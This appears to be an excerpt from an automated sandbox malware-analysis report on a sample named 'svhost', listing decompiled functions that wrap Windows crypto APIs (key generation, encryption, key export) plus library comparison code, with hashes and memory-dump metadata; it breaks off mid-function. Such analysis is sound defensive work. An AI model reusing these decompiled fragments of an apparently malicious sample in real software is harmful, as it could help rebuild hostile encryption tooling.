                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem
                                      • String ID:
                                      • API String ID: 2417226690-0
                                      • Opcode ID: c8da5166b4585535f2c50eb17551d11d696637ae64be1e883deab98882e83de7
                                      • Instruction ID: 92b46f05daa9ae127429786de24179c4002793c38d1df707ce8e133a3634c324
                                      • Opcode Fuzzy Hash: c8da5166b4585535f2c50eb17551d11d696637ae64be1e883deab98882e83de7
                                      • Instruction Fuzzy Hash: C0F0553670020567DB049F79D805AABBF94EFC1714F0A4068EB09DB6A1C672DC42CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E660F0 Relevance: 1.5, APIs: 1, Instructions: 30encryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00E660F0(intOrPtr __ecx, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				signed int _t11;
				intOrPtr _t14;
				void* _t17;
				void* _t23;
				void* _t24;
				signed int _t25;

				_t11 =  *0xeef074; // 0x221cac15
				_v8 = _t11 ^ _t25;
				_v16 = __ecx;
				_v12 = _a12;
				_t22 = _a8 & 0x000000ff;
				_t14 = _a4;
				__imp__CryptEncrypt(_t14, 0, _a8 & 0x000000ff, 0, 0,  &_v12, 0);
				if(_t14 == 0) {
					_v12 = 0;
				}
				return E00E89A35(_t17, _v8 ^ _t25, _t22, _t23, _t24);
			}












                                      0x00e660f6
                                      0x00e660fd
                                      0x00e66100
                                      0x00e66106
                                      0x00e66113
                                      0x00e6611a
                                      0x00e6611e
                                      0x00e66126
                                      0x00e66128
                                      0x00e66128
                                      0x00e6613f

                                      APIs
                                      • CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,00000000,?,?,221CAC15), ref: 00E6611E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CryptEncrypt
                                      • String ID:
                                      • API String ID: 1352496322-0
                                      • Opcode ID: fcf4b445357a810d950c6528dce18c32aeb9f1203e10143da2105d13d8de9685
                                      • Instruction ID: 4668a4bed41aad4f87b3b7a84e0c44528ce53f0f7883cfcf4778735561b05b2e
                                      • Opcode Fuzzy Hash: fcf4b445357a810d950c6528dce18c32aeb9f1203e10143da2105d13d8de9685
                                      • Instruction Fuzzy Hash: 1BF0F475A4420CBFDB04DFA5D855FAE7BB4EB58700F408099F905AB281D6759A448B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E66150 Relevance: 1.5, APIs: 1, Instructions: 27encryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00E66150(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				signed int _t9;
				char* _t11;
				void* _t14;
				void* _t19;
				void* _t20;
				void* _t21;
				signed int _t22;

				_t9 =  *0xeef074; // 0x221cac15
				_v8 = _t9 ^ _t22;
				_v16 = __ecx;
				_v12 = 0;
				_t11 =  &_v12;
				__imp__CryptExportKey(_a4, 0, 8, 0, 0, _t11);
				if(_t11 == 0) {
					_v12 = 0;
				}
				return E00E89A35(_t14, _v8 ^ _t22, _t19, _t20, _t21);
			}













                                      0x00e66156
                                      0x00e6615d
                                      0x00e66160
                                      0x00e66163
                                      0x00e6616a
                                      0x00e6617a
                                      0x00e66182
                                      0x00e66184
                                      0x00e66184
                                      0x00e6619b

                                      APIs
                                      • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000,?), ref: 00E6617A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CryptExport
                                      • String ID:
                                      • API String ID: 3389274496-0
                                      • Opcode ID: cae6bb3c5948325cbc859ed7f83b135bc139affbf6d388ec5d53d693c6b46d3c
                                      • Instruction ID: f1c23f66532c0909d227bdd24719f62f4d4d6d355e4485cb2c06e141f902118e
                                      • Opcode Fuzzy Hash: cae6bb3c5948325cbc859ed7f83b135bc139affbf6d388ec5d53d693c6b46d3c
                                      • Instruction Fuzzy Hash: 30F03770E4020CBFD714DF95DC51B9DBBB4AB14700F5080A9E505AB2C1DA7166048B44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB16D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00EAF1EF,?,20001004,00000000,00000002,?,?,00EAE7DA), ref: 00EB1709
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID:
                                      • API String ID: 2299586839-0
                                      • Opcode ID: 5f893a9010a488b7765511a07a92242812f520a83f51d0f8803075d4ee5a56b0
                                      • Instruction ID: 134060bfdfbaf3112b835287bec9699d53f1ea2ea1e49e8baa896ca6a3fe74a6
                                      • Opcode Fuzzy Hash: 5f893a9010a488b7765511a07a92242812f520a83f51d0f8803075d4ee5a56b0
                                      • Instruction Fuzzy Hash: C7E09A32100228BBCF122FA1EC28EDE3F2ABF44760F444020FC0072161CB328A21AA90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E66090 Relevance: 1.5, APIs: 1, Instructions: 21encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptGenKey.ADVAPI32(?,00006610,00000001,?,?,221CAC15), ref: 00E660AB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt
                                      • String ID:
                                      • API String ID: 993010335-0
                                      • Opcode ID: 77ac9cd9710f86c65a39832e2790facbe719987a5ee69d3a96d5c2c64a831207
                                      • Instruction ID: 08413a901ca5cc29829fc65209323d09a8b1d75e549be5d76b7fbf3912ea70d7
                                      • Opcode Fuzzy Hash: 77ac9cd9710f86c65a39832e2790facbe719987a5ee69d3a96d5c2c64a831207
                                      • Instruction Fuzzy Hash: 85E0D8745483486BDB10CAA4D891BEEBF785B01300F048098E9446B381C673858AD7E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E660D0 Relevance: 1.5, APIs: 1, Instructions: 12encryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E00E660D0(intOrPtr __ecx, long* _a4) {
				intOrPtr _v8;
				void* _t4;

				_push(__ecx);
				_v8 = __ecx;
				if(_a4 != 0) {
					return CryptDestroyKey(_a4);
				}
				return _t4;
			}





                                      0x00e660d3
                                      0x00e660d4
                                      0x00e660db
                                      0x00000000
                                      0x00e660e1
                                      0x00e660ea

                                      APIs
                                      • CryptDestroyKey.ADVAPI32(00000000,00000000,?,00E655BF,?,00000000,?,00E65585,?), ref: 00E660E1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CryptDestroy
                                      • String ID:
                                      • API String ID: 1712904745-0
                                      • Opcode ID: 14e09b62024179ad98e739781a8a0e96822b6d07e4bb9c3ceface2d70b7d6e68
                                      • Instruction ID: 91a0f1cd0a698dd46fe377e72be84f8b2fc8f3b857ae2c36cfeb7721aa68c8b6
                                      • Opcode Fuzzy Hash: 14e09b62024179ad98e739781a8a0e96822b6d07e4bb9c3ceface2d70b7d6e68
                                      • Instruction Fuzzy Hash: 77C012B145420CABC714CF95E809E997BACD704345F008169BE0457240D636D950C695
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EA19FD Relevance: .4, Instructions: 356COMMONLIBRARYCODECrypto
                                      Download Yara Rule
                                      C-Code - Quality: 91%
                                      			E00EA19FD(signed char* _a4, signed char* _a8, signed int _a12) {
				signed int _t688;
				void* _t690;
				signed int _t693;
				void* _t697;
				void* _t699;
				signed char _t756;
				signed char _t757;
				signed char _t758;
				signed char _t759;
				signed char _t761;
				signed char _t762;
				signed char _t763;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed char* _t815;
				signed int _t816;
				signed char* _t818;
				signed char* _t819;
				signed int _t820;
				void* _t842;
				signed int _t868;
				signed char* _t871;
				signed char* _t872;
				void* _t904;
				void* _t906;
				void* _t908;
				void* _t910;
				void* _t912;
				void* _t914;
				void* _t916;
				void* _t918;
				signed char* _t935;
				signed char* _t936;
				signed int _t938;
				signed char* _t941;
				signed char* _t942;

				_t812 = _a12;
				_t688 = _t812;
				if(_t688 == 0) {
					__eflags = 0;
					return 0;
				}
				_t690 = _t688 - 1;
				if(_t690 == 0) {
					_t813 =  *_a4 & 0x000000ff;
					_t693 =  *_a8 & 0x000000ff;
					L348:
					_t814 = _t813 - _t693;
					__eflags = _t814;
					if(_t814 != 0) {
						__eflags = _t814;
						_t672 = _t814 > 0;
						__eflags = _t672;
						_t814 = (0 | _t672) * 2 - 1;
					}
					L350:
					return _t814;
				}
				_t697 = _t690 - 1;
				if(_t697 == 0) {
					_t815 = _a4;
					_t935 = _a8;
					_t868 = ( *_t815 & 0x000000ff) - ( *_t935 & 0x000000ff);
					__eflags = _t868;
					if(_t868 != 0) {
						L353:
						_t816 = 0;
						__eflags = _t868;
						L346:
						_t814 = (_t816 & 0xffffff00 | __eflags > 0x00000000) * 2 - 1;
						goto L350;
					}
					_t813 = _t815[1] & 0x000000ff;
					_t684 =  &(_t935[1]); // 0xcc483c9
					_t693 =  *_t684 & 0x000000ff;
					goto L348;
				}
				_t699 = _t697 - 1;
				if(_t699 == 0) {
					_t818 = _a4;
					_t936 = _a8;
					_t868 = ( *_t818 & 0x000000ff) - ( *_t936 & 0x000000ff);
					__eflags = _t868;
					if(_t868 != 0) {
						goto L353;
					}
					_t678 =  &(_t936[1]); // 0xcc483c9
					_t868 = (_t818[1] & 0x000000ff) - ( *_t678 & 0x000000ff);
					__eflags = _t868;
					if(_t868 == 0) {
						_t813 = _t818[2] & 0x000000ff;
						_t680 =  &(_t936[2]); // 0x850cc483
						_t693 =  *_t680 & 0x000000ff;
						goto L348;
					}
					goto L353;
				}
				_t871 = _a8;
				if(_t699 == 1) {
					_t819 = _a4;
					_t938 = ( *_t819 & 0x000000ff) - ( *_t871 & 0x000000ff);
					__eflags = _t938;
					if(_t938 != 0) {
						L345:
						_t816 = 0;
						__eflags = _t938;
						goto L346;
					}
					_t662 =  &(_t871[1]); // 0xcc483c9
					_t938 = (_t819[1] & 0x000000ff) - ( *_t662 & 0x000000ff);
					__eflags = _t938;
					if(_t938 != 0) {
						goto L345;
					}
					_t664 =  &(_t871[2]); // 0x850cc483
					_t938 = (_t819[2] & 0x000000ff) - ( *_t664 & 0x000000ff);
					__eflags = _t938;
					if(_t938 == 0) {
						_t813 = _t819[3] & 0x000000ff;
						_t670 =  &(_t871[3]); // 0xc0850cc4
						_t693 =  *_t670 & 0x000000ff;
						goto L348;
					}
					goto L345;
				}
				_t941 = _a4;
				if(_t812 < 0x20) {
					L79:
					_t942 =  &(_t941[_t812]);
					_t872 =  &(_t871[_t812]);
					if(_t812 > 0x1f) {
						L144:
						_t820 = 0;
						L145:
						return _t820;
					}
					switch( *((intOrPtr*)(_t812 * 4 +  &M00EA2A91))) {
						case 0:
							goto L144;
						case 1:
							L209:
							asm("lfence");
							__eax =  *(__edx - 1) & 0x000000ff;
							__ecx =  *(__esi - 1) & 0x000000ff;
							__ecx = ( *(__esi - 1) & 0x000000ff) - ( *(__edx - 1) & 0x000000ff);
							__eflags = __ecx;
							if(__ecx != 0) {
								__eax = 0;
								__eflags = __ecx;
								__eax = 0 | __ecx > 0x00000000;
								__ecx = (__ecx > 0) * 2 - 1;
							}
							goto L145;
						case 2:
							L274:
							__eflags =  *(__esi - 2) -  *(__edx - 2);
							if( *(__esi - 2) ==  *(__edx - 2)) {
								goto L144;
							}
							goto L340;
						case 3:
							L339:
							asm("lfence");
							__edi =  *(__esi - 3) & 0x000000ff;
							__eax =  *(__edx - 3) & 0x000000ff;
							__edi = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L341:
								__ecx = 0;
								__eflags = __edi;
								0 | __edi > 0x00000000 = (0 | __edi > 0x00000000) * 2 - 1;
								goto L145;
							}
							L340:
							asm("lfence");
							__eax =  *(__edx - 2) & 0x000000ff;
							__edi =  *(__esi - 2) & 0x000000ff;
							__edi = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								goto L209;
							}
							goto L341;
						case 4:
							L135:
							if( *(_t942 - 4) ==  *(_t872 - 4)) {
								_t820 = 0;
								__eflags = 0;
								L143:
								if(_t820 != 0) {
									goto L145;
								}
								goto L144;
							}
							asm("lfence");
							_t876 = ( *(_t942 - 4) & 0x000000ff) - ( *(_t872 - 4) & 0x000000ff);
							if(_t876 != 0) {
								L139:
								_t820 = (0 | _t876 > 0x00000000) * 2 - 1;
								goto L143;
							}
							asm("lfence");
							_t876 = ( *(_t942 - 3) & 0x000000ff) - ( *(_t872 - 3) & 0x000000ff);
							if(_t876 != 0) {
								goto L139;
							}
							asm("lfence");
							_t876 = ( *(_t942 - 2) & 0x000000ff) - ( *(_t872 - 2) & 0x000000ff);
							if(_t876 == 0) {
								asm("lfence");
								_t820 = ( *(_t942 - 1) & 0x000000ff) - ( *(_t872 - 1) & 0x000000ff);
								__eflags = _t820;
								if(_t820 != 0) {
									__eflags = _t820;
									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
								}
								goto L143;
							}
							goto L139;
						case 5:
							L200:
							__eax =  *(__esi - 5);
							__eflags =  *(__esi - 5) -  *(__edx - 5);
							if( *(__esi - 5) ==  *(__edx - 5)) {
								__ecx = 0;
								__eflags = 0;
								L208:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L209;
							}
							asm("lfence");
							__edi =  *(__esi - 5) & 0x000000ff;
							__eax =  *(__edx - 5) & 0x000000ff;
							__edi = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L204:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L208;
							}
							asm("lfence");
							__edi =  *(__esi - 4) & 0x000000ff;
							__eax =  *(__edx - 4) & 0x000000ff;
							__edi = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L204;
							}
							asm("lfence");
							__edi =  *(__esi - 3) & 0x000000ff;
							__eax =  *(__edx - 3) & 0x000000ff;
							__edi = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 2) & 0x000000ff;
								__eax =  *(__edx - 2) & 0x000000ff;
								__ecx = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L208;
							}
							goto L204;
						case 6:
							L265:
							__eax =  *(__esi - 6);
							__eflags =  *(__esi - 6) -  *(__edx - 6);
							if( *(__esi - 6) ==  *(__edx - 6)) {
								__ecx = 0;
								__eflags = 0;
								L273:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L274;
							}
							asm("lfence");
							__edi =  *(__esi - 6) & 0x000000ff;
							__eax =  *(__edx - 6) & 0x000000ff;
							__edi = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L269:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L273;
							}
							asm("lfence");
							__edi =  *(__esi - 5) & 0x000000ff;
							__eax =  *(__edx - 5) & 0x000000ff;
							__edi = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L269;
							}
							asm("lfence");
							__edi =  *(__esi - 4) & 0x000000ff;
							__eax =  *(__edx - 4) & 0x000000ff;
							__edi = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 3) & 0x000000ff;
								__eax =  *(__edx - 3) & 0x000000ff;
								__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L273;
							}
							goto L269;
						case 7:
							L330:
							__eax =  *(__esi - 7);
							__eflags =  *(__esi - 7) -  *(__edx - 7);
							if( *(__esi - 7) ==  *(__edx - 7)) {
								__ecx = 0;
								__eflags = 0;
								L338:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L339;
							}
							asm("lfence");
							__edi =  *(__esi - 7) & 0x000000ff;
							__eax =  *(__edx - 7) & 0x000000ff;
							__edi = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L334:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L338;
							}
							asm("lfence");
							__edi =  *(__esi - 6) & 0x000000ff;
							__eax =  *(__edx - 6) & 0x000000ff;
							__edi = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L334;
							}
							asm("lfence");
							__edi =  *(__esi - 5) & 0x000000ff;
							__eax =  *(__edx - 5) & 0x000000ff;
							__edi = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 4) & 0x000000ff;
								__eax =  *(__edx - 4) & 0x000000ff;
								__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L338;
							}
							goto L334;
						case 8:
							L126:
							if( *(_t942 - 8) ==  *(_t872 - 8)) {
								_t820 = 0;
								__eflags = 0;
								L134:
								if(_t820 != 0) {
									goto L145;
								}
								goto L135;
							}
							asm("lfence");
							_t880 = ( *(_t942 - 8) & 0x000000ff) - ( *(_t872 - 8) & 0x000000ff);
							if(_t880 != 0) {
								L130:
								_t820 = (0 | _t880 > 0x00000000) * 2 - 1;
								goto L134;
							}
							asm("lfence");
							_t880 = ( *(_t942 - 7) & 0x000000ff) - ( *(_t872 - 7) & 0x000000ff);
							if(_t880 != 0) {
								goto L130;
							}
							asm("lfence");
							_t880 = ( *(_t942 - 6) & 0x000000ff) - ( *(_t872 - 6) & 0x000000ff);
							if(_t880 == 0) {
								asm("lfence");
								_t820 = ( *(_t942 - 5) & 0x000000ff) - ( *(_t872 - 5) & 0x000000ff);
								__eflags = _t820;
								if(_t820 != 0) {
									__eflags = _t820;
									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
								}
								goto L134;
							}
							goto L130;
						case 9:
							L191:
							__eax =  *(__esi - 9);
							__eflags =  *(__esi - 9) -  *(__edx - 9);
							if( *(__esi - 9) ==  *(__edx - 9)) {
								__ecx = 0;
								__eflags = 0;
								L199:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L200;
							}
							asm("lfence");
							__eax =  *(__edx - 9) & 0x000000ff;
							__edi =  *(__esi - 9) & 0x000000ff;
							__edi = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L195:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L199;
							}
							asm("lfence");
							__edi =  *(__esi - 8) & 0x000000ff;
							__eax =  *(__edx - 8) & 0x000000ff;
							__edi = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L195;
							}
							asm("lfence");
							__edi =  *(__esi - 7) & 0x000000ff;
							__eax =  *(__edx - 7) & 0x000000ff;
							__edi = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 6) & 0x000000ff;
								__eax =  *(__edx - 6) & 0x000000ff;
								__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L199;
							}
							goto L195;
						case 0xa:
							L256:
							__eax =  *(__esi - 0xa);
							__eflags =  *(__esi - 0xa) -  *(__edx - 0xa);
							if( *(__esi - 0xa) ==  *(__edx - 0xa)) {
								__ecx = 0;
								__eflags = 0;
								L264:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L265;
							}
							asm("lfence");
							__eax =  *(__edx - 0xa) & 0x000000ff;
							__edi =  *(__esi - 0xa) & 0x000000ff;
							__edi = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L260:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L264;
							}
							asm("lfence");
							__eax =  *(__edx - 9) & 0x000000ff;
							__edi =  *(__esi - 9) & 0x000000ff;
							__edi = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L260;
							}
							asm("lfence");
							__eax =  *(__edx - 8) & 0x000000ff;
							__edi =  *(__esi - 8) & 0x000000ff;
							__edi = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__eax =  *(__edx - 7) & 0x000000ff;
								__ecx =  *(__esi - 7) & 0x000000ff;
								__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L264;
							}
							goto L260;
						case 0xb:
							L321:
							__eax =  *(__esi - 0xb);
							__eflags =  *(__esi - 0xb) -  *(__edx - 0xb);
							if( *(__esi - 0xb) ==  *(__edx - 0xb)) {
								__ecx = 0;
								__eflags = 0;
								L329:
								__eflags = __ecx;
								if(__ecx != 0) {
									goto L145;
								}
								goto L330;
							}
							asm("lfence");
							__edi =  *(__esi - 0xb) & 0x000000ff;
							__eax =  *(__edx - 0xb) & 0x000000ff;
							__edi = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								L325:
								__ecx = 0;
								__eflags = __edi;
								__ecx = 0 | __edi > 0x00000000;
								__ecx = (__edi > 0) * 2 - 1;
								goto L329;
							}
							asm("lfence");
							__edi =  *(__esi - 0xa) & 0x000000ff;
							__eax =  *(__edx - 0xa) & 0x000000ff;
							__edi = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
							__eflags = __edi;
							if(__edi != 0) {
								goto L325;
							}
							asm("lfence");
							__edi =  *(__esi - 9) & 0x000000ff;
							__eax =  *(__edx - 9) & 0x000000ff;
							__edi = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
							__eflags = __edi;
							if(__edi == 0) {
								asm("lfence");
								__ecx =  *(__esi - 8) & 0x000000ff;
								__eax =  *(__edx - 8) & 0x000000ff;
								__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __ecx > 0x00000000;
									__ecx = (__ecx > 0) * 2 - 1;
								}
								goto L329;
							}
							goto L325;
						case 0xc:
							L117:
